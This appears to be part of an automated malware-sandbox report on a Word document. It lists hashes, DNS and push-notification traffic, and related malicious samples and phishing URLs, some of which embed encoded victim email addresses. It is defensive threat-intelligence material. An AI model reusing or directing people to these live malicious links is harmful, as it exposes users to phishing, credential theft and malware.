	https://emp.eduyield.com/el?aid=962445be-3c17-11ec-9620-0e45aa61dde5&cid=497&dest=https://google.com/amp/avrancecorp.com/wp-web/Griffinwink/64616b6f74616c796e6e406772696666696e77696e6b2e636f6d/$ZGFrb3&pid=564628&rid=68730789	Get hash	malicious	Unknown	Browse	50.6.174.34
	logitix.pdf	Get hash	malicious	HTMLPhisher	Browse	69.49.230.198
	Document_31055.pdf	Get hash	malicious	Unknown	Browse	108.167.132.254
	http://pomservicing.co.uk/pomservicing/Smtb/dGVzdF9tYWlsQGVtYWlsLmpw==%C3%A3%E2%82%AC%E2%80%9A$$%C3%A3%E2%82%AC%E2%80%9A/1/010001943914714a-a13d10fa-2f31-4a50-b2fa-f3854398d733-000000/CAe7zeJgIBBw_nSVrUkbbcG65_c=407	Get hash	malicious	HTMLPhisher	Browse	69.49.230.198
	Ecastillo-In Service Agreement.pdf	Get hash	malicious	HTMLPhisher	Browse	69.49.230.198
	https://www.tiktok.com/link/v2?aid=1988&lang=en&scene=bio_url&target=https%3A%2F%2Fgoogle.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%253Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3D.%2F%2F%2F%2Famp%2Fs%2Fjobuli.in%2Fwinner%2FsXtxg%2FbWFyc2hhLnJvd2xhbmRAY2hlcm9rZWVicmljay5jb20=?0s57db=MTMmMTMmMTMmMTMmQjEmRjQmb2JxdEczJkQ0Jk11bHdyVGhHeUtZLi45SjNYNlJyamY6ckY0JjMzJnV5ZnUub2ZlZWppMzMmRTQmdHRibWQxMyZvYnF0RDQmQjEmRjQmbW51aUczJkQ0JkIxJkY0JnplcGNHMyZENCZCMSZGNCZ6ZXBjRDQmQjEmRjQmZWJmaUczJkQ0JkIxJkY0JmZtenV0RzMmRDQmMTMmMTMmMTMmMTMmQjEmRTgmMTMmMTMmMTMmMTMmMTMmMTMmMTMmMTMmQjEmQzQmb2ZlZWppMTMmQjQmenVqbWpjanRqdzEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJkIxJkM0JmZ1aml4MTMmQjQmc3BtcGQxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZDOCYxMyZ1eWZ1Lm9mZWVqaS8xMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZGNCZmbXp1dEQ0JjEzJjEzJjEzJjEzJkIxJkY0JmZtdWp1RzMmRDQmZm5wSUY0JmZtdWp1RDQmMTMmMTMmMTMmMTMmQjEmRzMmKzEzJmZzMTMmZWViMTMmRTQmRTQmRTQmRTQmRTQmRTQmRDQmMTMmK0czJjEzJjEzJkY0JjMzJkI6NjMmMTk2MyYzRjYzJkRCNjMmMzk2MyYzRjYzJjRCNjMmNEQ2MyY1MyY1MyZCOjYzJjE5NjMmM0Y2MyZEQjYzJjM5NjMmM0Y2MyY0QjYzJjRENjMmRTQmRTQmeGN6Nnpka21IZXtHSGN4MlRaelM0Wm1HSFJpT1hidkdIZXs2VFp2R25bbVM0ZEczJkROUEVHMyZ6ZndzdnR0c2Z6YkczJmx2L3BkL3pmd3N2dHRzZnpiRzMmRzMmQjQmdHF1dWlFNCZtc3ZDNCYzMzMmRTQmdW9mdW9wZDEzJjMzJml0ZnNnZnMzMyZFNCZ3anZyZi5xdXVpMTMmYnVmbkQ0JjEzJjEzJjEzJjEzJkIxJkY0JjMzJjkuR1VWMzMmRTQmdWZ0c2JpZDEzJmJ1Zm5ENCYxMyYxMyYxMyYxMyZCMSZGNCZlYmZpRDQmQjEmRjQmbW51aUQ0JkIxJkY0Jm9icXRHMyZENCZkazdoWlZENCZ0ezVNRTQmTFhteDFPUWdkWFBZc3s1d0c5e1FFNiZDT0Y0JjMzJnV5ZnUub2ZlZWppMzMmRTQmdHRibWQxMyZvYnF0RDQmQjEm	Get hash	malicious	HTMLPhisher	Browse	69.49.230.198
	https://umanocosmetic.com/n/?c3Y9bzM2NV8xX29uZSZyYW5kPVpHcG5ZM0U9JnVpZD1VU0VSMDkwMTIwMjVVNTgwMTA5NTY=N0123N%5BEMAIL%5D	Get hash	malicious	Unknown	Browse	192.185.221.152
	https://www.tiktok.com/link/v2?aid=1988&lang=en&scene=bio_url&target=https%3A%2F%2Fgoogle.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%253Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3D.%2F%2F%2F%2Famp%2Fs%2Fmessagupdates.courtfilepro.com%2FVTtMa	Get hash	malicious	HTMLPhisher	Browse	69.49.230.198
	http://bebizicon.com/Campususa/index.xml#?email=b2xpdmllci5kb3phdEBpbm5vY2FwLmNvbQ==	Get hash	malicious	EvilProxy, HTMLPhisher	Browse	108.167.132.194
OVHFR	mlfk8sYaiy.dll	Get hash	malicious	Wannacry	Browse	51.178.254.227
	Debh Payment Detail.html	Get hash	malicious	Unknown	Browse	167.114.158.15
	Debh Payment Detail.html	Get hash	malicious	Unknown	Browse	167.114.158.15
	http://www.affordablehousing.com/MaineCWL	Get hash	malicious	Unknown	Browse	51.38.120.206
	https://www.xrmtoolbox.com/	Get hash	malicious	Unknown	Browse	51.255.30.108
	x86.elf	Get hash	malicious	Unknown	Browse	54.37.53.121
	Employee_Salary_Update.docx	Get hash	malicious	Unknown	Browse	158.69.4.253
	x86_64.elf	Get hash	malicious	Unknown	Browse	51.161.74.225
	http://nkomm.fr	Get hash	malicious	Unknown	Browse	54.38.81.29
	arm7.elf	Get hash	malicious	Mirai	Browse	178.32.95.240
AMAZON-02US	http://ankur-1994.github.io/netflix_clone	Get hash	malicious	HTMLPhisher	Browse	13.32.99.112
	http://telemgram-rv.org/	Get hash	malicious	HTMLPhisher	Browse	65.9.66.27
	Eastern Contractors Corporation Contract and submittal document.eml	Get hash	malicious	Unknown	Browse	52.34.202.214
	https://jpmchase.secure.virtru.com/start/?c=experiment&t=emailtemplate2019-09&s=ccs.collections%40jpmchase.com&p=c0d0aede-7bea-4ead-a752-2d73ef1c7343#v=3.0.0&d=https%3A%2F%2Fapi.virtru.com%2Fstorage%2Fapi%2Fpolicies%2Fc0d0aede-7bea-4ead-a752-2d73ef1c7343%2Fdata%2Fmetadata&dk=1k9dx%2B9Tl5K3SfB3B3irzBa9ZHLb5jXqYy1n7NSx1lE%3D	Get hash	malicious	Unknown	Browse	34.211.34.11
	boatnet.sh4.elf	Get hash	malicious	Mirai	Browse	54.171.230.55
	habHh1BC0L.dll	Get hash	malicious	Wannacry	Browse	3.72.157.1
	19MgUpI9tj.dll	Get hash	malicious	Wannacry	Browse	18.142.24.211
	https://securityalert-corporate.com/click/f288bff9-842d-4e34-8d2d-41ad20e48e9d	Get hash	malicious	Unknown	Browse	108.138.7.65
	http://monitor.linkwhat.com/tl4tl4726Qz107cK770xR10599lj360px17lb07468gl70015oV95328Kn41253VG39381FP5605427918==aru2826664	Get hash	malicious	Phisher	Browse	3.128.168.120
	main_m68k.elf	Get hash	malicious	Mirai	Browse	54.171.230.55

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
1138de370e523e824bbca92d049a3777	https://telegrimc.cn/	Get hash	malicious	Unknown	Browse	173.222.162.64
	http://telemgram-ra.org/	Get hash	malicious	Unknown	Browse	173.222.162.64
	87c6RORO31.dll	Get hash	malicious	Wannacry	Browse	173.222.162.64
	eIZi481eP6.dll	Get hash	malicious	Wannacry	Browse	173.222.162.64
	m9oUIFauYl.dll	Get hash	malicious	Wannacry	Browse	173.222.162.64
	sUlHfYQxNw.dll	Get hash	malicious	Wannacry	Browse	173.222.162.64
	MK9UBUl8t7.dll	Get hash	malicious	Wannacry	Browse	173.222.162.64
	mCgW5qofxC.dll	Get hash	malicious	Wannacry	Browse	173.222.162.64
	http://titanys.mindsetmatters.buzz	Get hash	malicious	ScreenConnect Tool	Browse	173.222.162.64
	Document_31055.pdf	Get hash	malicious	Unknown	Browse	173.222.162.64
3b5074b1b5d032e5620f69f9f700ff0e	https://telegrimc.cn/	Get hash	malicious	Unknown	Browse	40.115.3.253 40.113.103.199
	04Ct9PoJrL.dll	Get hash	malicious	Wannacry	Browse	40.115.3.253 40.113.103.199
	87c6RORO31.dll	Get hash	malicious	Wannacry	Browse	40.115.3.253 40.113.103.199
	m9oUIFauYl.dll	Get hash	malicious	Wannacry	Browse	40.115.3.253 40.113.103.199
	MK9UBUl8t7.dll	Get hash	malicious	Wannacry	Browse	40.115.3.253 40.113.103.199
	mCgW5qofxC.dll	Get hash	malicious	Wannacry	Browse	40.115.3.253 40.113.103.199
	http://pomservicing.co.uk/pomservicing/Smtb/dGVzdF9tYWlsQGVtYWlsLmpw==%C3%A3%E2%82%AC%E2%80%9A$$%C3%A3%E2%82%AC%E2%80%9A/1/010001943914714a-a13d10fa-2f31-4a50-b2fa-f3854398d733-000000/CAe7zeJgIBBw_nSVrUkbbcG65_c=407	Get hash	malicious	HTMLPhisher	Browse	40.115.3.253 40.113.103.199
	lumma_phothockey.exe	Get hash	malicious	LummaC	Browse	40.115.3.253 40.113.103.199
	QUOTATION REQUIRED_Enatel s.r.l..exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	40.115.3.253 40.113.103.199
	EspPrivStoreAtt116.exe	Get hash	malicious	Unknown	Browse	40.115.3.253 40.113.103.199

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping1924_689616758\Google.Widevine.CDM.dll	https://forrestore.com/static/apps/437.zip	Get hash	malicious	Unknown	Browse
	Remittance.html	Get hash	malicious	Unknown	Browse
	Scan.html	Get hash	malicious	HTMLPhisher	Browse
	https://maya-lopez.filemail.com/t/XhcWEjoR	Get hash	malicious	Unknown	Browse
	Undelivered Messages.htm	Get hash	malicious	Unknown	Browse
	https://dev-alberta-ca.pantheonsite.io/?email=central@ngps.ca	Get hash	malicious	Unknown	Browse
	AllItems.htm	Get hash	malicious	HTMLPhisher	Browse
	#Employee-Letter.pdf	Get hash	malicious	Unknown	Browse
	index.html	Get hash	malicious	CAPTCHA Scam ClickFix	Browse
	YF3YnL4ksc.exe	Get hash	malicious	Unknown	Browse

Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	4.703065709201963
Encrypted:	false
SSDEEP:	3:C1ClXLlAnOqh37yEfY1A86LH04plhnCllO0PL6l54:blsCv4pmllO0PL6/4
MD5:	C6D210058E887CBC6380A45746D3E8E5
SHA1:	C362155AF5639FBC0786B5BFD3579E8C2548C626
SHA-256:	A5A8301679687412B3AB6DC9D71543CC9D85219F45301D6C731DC735649460C4
SHA-512:	DE8AB664D61123CC2FA00D6982A6EDC45CCE9D3A173063FF9A734D81CFF25148A65985C8ADEA0B19BE23618B61605196EB70BDE66405B4A461947247E6893857
Malicious:	false
Reputation:	low
Preview:	.user...............................................e.n.g.i.n.e.e.r....k..+z.y{.../.....rC.u...\......2...b'.?h)......n..}3S.f........>..$:.}.0j......9..=.i

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1796
Entropy (8bit):	6.024410992426995
Encrypted:	false
SSDEEP:	48:p/hQ/oCI1PBpFNJ7aksQCZYrudz2kfWh61su:RsoXJj7abQAYal26l
MD5:	A4108729F97CAD545F4F3FB3C1AB93BF
SHA1:	20FE72A323C0814E2AA28588CA72328F27A131FA
SHA-256:	8E5C6E5E3E6827B2A7DDE1AF10F6D1F462510871B2F117FE45B8B538F35EBFE3
SHA-512:	33B8F0579E9C7121680D55C6E3B3F565B3EEA7848E0170AD85EF0F0028056D910EACFDF5D3F2B0D726080721AE1F41D92927E801C429C34BB951945010B76592
Malicious:	false
Reputation:	low
Preview:	[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiJjcl9lbi11c181MDAwMDBfaW5kZXguYmluIiwicm9vdF9oYXNoIjoiSnRXcUxvbWdicmx1Z3lELTIxdzA1a0lSY2ZkbXV2NzAydG0yZTBSZ3c1cyJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiI2bjV1dWJBVS1KZ3FCUEVNc3VrVHB4b1Q0TjRnQkhENm16eDRHbFBJMV9RIn1dLCJmb3JtYXQiOiJ0cmVlaGFzaCIsImhhc2hfYmxvY2tfc2l6ZSI6NDA5Nn1dLCJpdGVtX2lkIjoib2JlZGJiaGJwbW9qbmthbmljaW9nZ25tZWxtb29tb2MiLCJpdGVtX3ZlcnNpb24iOiIyMDI1MDEwNi43MTQyNjEzODEuMTQiLCJwcm90b2NvbF92ZXJzaW9uIjoxfQ","signatures":[{"header":{"kid":"publisher"},"protected":"eyJhbGciOiJSUzI1NiJ9","signature":"DZjCDLkWxzAtIuVsJTstv073p9NITU_rh3ThMU1n0LnQN3-W9bk1mLJRK7WbmdpKfl4H_v2-mnJrN61C3o4qvbqyRjih4GToXOHrtKF9CFVrg2FgZ8iCctYLCl1tc-9QinHJBOH2z3Rs4zPY87AqxVo_XWSvMb63205TBgyS1uU1L7ll6cIfNhTmiPgrdzz3g6xwYkwqy0e2efJmMhwz-Yo4I6f4eUhvbiFPMShdP3QpOriUifT8mtruPPHldobm3pGWK6i4vUNURVa60RjgoGkgPC7k7e28JryUwoDGHk2WWUQBTnKS0SoxRr3

File type:	Microsoft Word 2007+
Entropy (8bit):	7.652182832359709
TrID:	Word Microsoft Office Open XML Format document (49504/1) 58.23% Word Microsoft Office Open XML Format document (27504/1) 32.35% ZIP compressed archive (8000/1) 9.41%
File name:	mitel.docx
File size:	27'805 bytes
MD5:	23beeecf983235201c815dd316cc03bc
SHA1:	65f9f73aa09823f590a0e1d17db8133b8f45e01e
SHA256:	daa1e43c59c142ddea9b13c28d853b72c53f6d3ef198c3212e52a3812df3e88a
SHA512:	13b2f06a9be772ae91073a254a77043f2a5e3414539c027c4d84ba216cb983ee4409475d48edadc0d21e24c336104cffb4004690367fb59d2e90b1a841b8c344
SSDEEP:	768:32ljAZZKN2OVJhfqKbycuF6ukKizo38DcPB:6PN2AhCr8guo38IZ
TLSH:	59C2C02FCAA3AA34E63E407B475416F9FD154142FB30A949BD80B848295F9463BB0F4A
File Content Preview:	PK..........!.....e...R.......[Content_Types].xml ...(.........................................................................................................................................................................................................

Has Summary Info:
Application Name:
Encrypted Document:	False
Contains Word Document Stream:	True
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:	False
Flash Objects Count:	0
Contains VBA Macros:	False

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 15, 2025 00:30:01.489255905 CET	63290	53	192.168.2.6	1.1.1.1
Jan 15, 2025 00:30:01.489409924 CET	57308	53	192.168.2.6	1.1.1.1
Jan 15, 2025 00:30:01.498104095 CET	53	54853	1.1.1.1	192.168.2.6
Jan 15, 2025 00:30:01.504647970 CET	53	57308	1.1.1.1	192.168.2.6
Jan 15, 2025 00:30:01.506894112 CET	53	58401	1.1.1.1	192.168.2.6
Jan 15, 2025 00:30:01.513299942 CET	53	63290	1.1.1.1	192.168.2.6
Jan 15, 2025 00:30:02.529717922 CET	53	65381	1.1.1.1	192.168.2.6
Jan 15, 2025 00:30:02.675055027 CET	61435	53	192.168.2.6	1.1.1.1
Jan 15, 2025 00:30:02.675376892 CET	49499	53	192.168.2.6	1.1.1.1
Jan 15, 2025 00:30:02.686559916 CET	53	61435	1.1.1.1	192.168.2.6
Jan 15, 2025 00:30:02.688919067 CET	53	49499	1.1.1.1	192.168.2.6
Jan 15, 2025 00:30:04.413626909 CET	51332	53	192.168.2.6	1.1.1.1
Jan 15, 2025 00:30:04.413836002 CET	65268	53	192.168.2.6	1.1.1.1
Jan 15, 2025 00:30:04.437823057 CET	53	65268	1.1.1.1	192.168.2.6
Jan 15, 2025 00:30:04.727183104 CET	53	51332	1.1.1.1	192.168.2.6
Jan 15, 2025 00:30:06.078083992 CET	63684	53	192.168.2.6	1.1.1.1
Jan 15, 2025 00:30:06.078279018 CET	60796	53	192.168.2.6	1.1.1.1
Jan 15, 2025 00:30:06.086343050 CET	53	63684	1.1.1.1	192.168.2.6
Jan 15, 2025 00:30:06.086586952 CET	53	60796	1.1.1.1	192.168.2.6
Jan 15, 2025 00:30:09.689538002 CET	55503	53	192.168.2.6	1.1.1.1
Jan 15, 2025 00:30:09.689754009 CET	61236	53	192.168.2.6	1.1.1.1
Jan 15, 2025 00:30:09.731987000 CET	53	61236	1.1.1.1	192.168.2.6
Jan 15, 2025 00:30:09.851079941 CET	53	55503	1.1.1.1	192.168.2.6
Jan 15, 2025 00:30:19.559593916 CET	53	62802	1.1.1.1	192.168.2.6
Jan 15, 2025 00:30:38.606048107 CET	53	61980	1.1.1.1	192.168.2.6
Jan 15, 2025 00:31:01.360735893 CET	53	60365	1.1.1.1	192.168.2.6
Jan 15, 2025 00:31:01.450156927 CET	53	57426	1.1.1.1	192.168.2.6
Jan 15, 2025 00:31:04.496673107 CET	53	53902	1.1.1.1	192.168.2.6
Jan 15, 2025 00:31:32.233141899 CET	53	56102	1.1.1.1	192.168.2.6
Jan 15, 2025 00:32:09.024178982 CET	53	61057	1.1.1.1	192.168.2.6
Jan 15, 2025 00:32:17.561841011 CET	53	51911	1.1.1.1	192.168.2.6

Timestamp	Bytes transferred	Direction	Data
2025-01-14 23:29:53 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 31 52 65 6a 36 33 6d 79 51 30 71 66 34 62 34 53 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 66 31 33 63 66 63 31 39 66 30 35 31 61 31 35 38 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: 1Rej63myQ0qf4b4S.1Context: f13cfc19f051a158
2025-01-14 23:29:53 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2025-01-14 23:29:53 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 31 52 65 6a 36 33 6d 79 51 30 71 66 34 62 34 53 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 66 31 33 63 66 63 31 39 66 30 35 31 61 31 35 38 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 64 4c 37 44 41 61 77 73 33 79 66 47 52 39 6b 62 50 47 2f 35 72 6f 2f 58 58 4c 67 32 65 4c 73 36 30 74 6f 69 52 47 68 75 31 37 61 4f 34 67 56 43 49 71 37 6e 7a 77 30 6a 49 2f 69 5a 45 54 65 35 30 58 4b 71 58 69 66 63 2b 31 6a 4e 44 31 6b 35 55 41 4d 69 37 6c 4a 67 48 4e 63 7a 36 35 66 71 2f 32 73 72 5a 72 30 65 44 4b 4e 72 77 Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: 1Rej63myQ0qf4b4S.2Context: f13cfc19f051a158<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAdL7DAaws3yfGR9kbPG/5ro/XXLg2eLs60toiRGhu17aO4gVCIq7nzw0jI/iZETe50XKqXifc+1jND1k5UAMi7lJgHNcz65fq/2srZr0eDKNrw
2025-01-14 23:29:53 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 31 52 65 6a 36 33 6d 79 51 30 71 66 34 62 34 53 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 66 31 33 63 66 63 31 39 66 30 35 31 61 31 35 38 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: 1Rej63myQ0qf4b4S.3Context: f13cfc19f051a158<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2025-01-14 23:29:53 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2025-01-14 23:29:53 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 45 48 49 6e 4a 32 57 5a 50 45 75 51 2f 77 73 4e 6d 52 4a 73 72 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: EHInJ2WZPEuQ/wsNmRJsrg.0Payload parsing failed.

Timestamp	Bytes transferred	Direction	Data
2025-01-14 23:30:01 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 6f 6d 58 6b 4d 59 66 51 66 30 2b 35 43 64 50 38 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 62 33 63 65 37 39 61 32 64 61 66 65 30 38 66 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: omXkMYfQf0+5CdP8.1Context: 2b3ce79a2dafe08f
2025-01-14 23:30:01 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2025-01-14 23:30:01 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 6f 6d 58 6b 4d 59 66 51 66 30 2b 35 43 64 50 38 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 62 33 63 65 37 39 61 32 64 61 66 65 30 38 66 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 64 4c 37 44 41 61 77 73 33 79 66 47 52 39 6b 62 50 47 2f 35 72 6f 2f 58 58 4c 67 32 65 4c 73 36 30 74 6f 69 52 47 68 75 31 37 61 4f 34 67 56 43 49 71 37 6e 7a 77 30 6a 49 2f 69 5a 45 54 65 35 30 58 4b 71 58 69 66 63 2b 31 6a 4e 44 31 6b 35 55 41 4d 69 37 6c 4a 67 48 4e 63 7a 36 35 66 71 2f 32 73 72 5a 72 30 65 44 4b 4e 72 77 Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: omXkMYfQf0+5CdP8.2Context: 2b3ce79a2dafe08f<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAdL7DAaws3yfGR9kbPG/5ro/XXLg2eLs60toiRGhu17aO4gVCIq7nzw0jI/iZETe50XKqXifc+1jND1k5UAMi7lJgHNcz65fq/2srZr0eDKNrw
2025-01-14 23:30:01 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 6f 6d 58 6b 4d 59 66 51 66 30 2b 35 43 64 50 38 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 62 33 63 65 37 39 61 32 64 61 66 65 30 38 66 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: omXkMYfQf0+5CdP8.3Context: 2b3ce79a2dafe08f<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2025-01-14 23:30:01 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2025-01-14 23:30:01 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 34 45 7a 64 33 61 42 43 57 30 71 55 44 69 4d 56 50 49 6f 38 58 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: 4Ezd3aBCW0qUDiMVPIo8Xw.0Payload parsing failed.

Timestamp	Bytes transferred	Direction	Data
